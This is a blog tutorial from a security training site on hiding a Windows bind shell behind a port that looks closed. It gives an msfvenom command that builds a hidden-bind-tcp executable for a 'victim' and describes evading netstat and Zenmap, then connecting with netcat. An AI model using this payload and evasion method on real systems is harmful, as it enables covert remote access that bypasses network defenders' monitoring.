The Ultimate Guide to Automation Testing
Have you heard about the term “test automation” but don’t really know what it is? Well, you’ve come to the right page! Get all your
Every company has a variety of scanners for analyzing its network and identifying new or unknown open ports. It’s unthinkable to disguise the potentially malicious bind shellcode within that kind of setting and stay undetected by their scanners.
In this article, we will look at how one can hide Shellcode behind a closed port.
Hidden Bind TCP shell listens for connections from the host’s IP address (Ahost) and responds with an RST packet to other connections. It makes the port appear closed, allowing us to disguise the Shellcode.
Let’s dig it further!
With msfvenom, generate a payload for victim PC (Windows machine) utilizing shell_hidden _bind_tcp and output a file with .exe format.
msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=4321 -f exe > file.exe
Transfer the payload to the victim machine (here, I am using “cifs utils” to transmit the malicious payload.)
When the victim runs the file, it will start a new service with port number 4321 connected to the attacker’s IP.
For instance, if the victim executes the “netstat command” to check the active connections, then port 4321 somehow won’t have an IP address; that looks that specific local services are operating on local connections.
And by chance, if the victim scans the ports through any scanner like Zenmap, then the malicious port will appear close on that tool as well.
When the attacker scans the target IP, the port will appear as open.
nmap -p [Port-num] [Target IP]
An attacker can have a session on the victim machine using netcat as well.
In this tutorial, we saw the sorcery of hiding a TCP Bind Shellcode behind a closed port. Using “msfvenom,” we created a payload, transferred it to the victim machine using “cifs utils,” and bang, we succeeded with an open port and a session of the victim machine using “netcat.”
Industrial Cybersecurity
September 28, 2023
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings
Have you heard about the term “test automation” but don’t really know what it is? Well, you’ve come to the right page! Get all your
This article explores the idea of discovering the victim’s location. Previously, we have used several tools for OSINT purposes, so, today let us try this
Can random characters in your code get you in trouble? They certainly can! Today, we are going to discuss CRLF injections and improper neutralization of
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings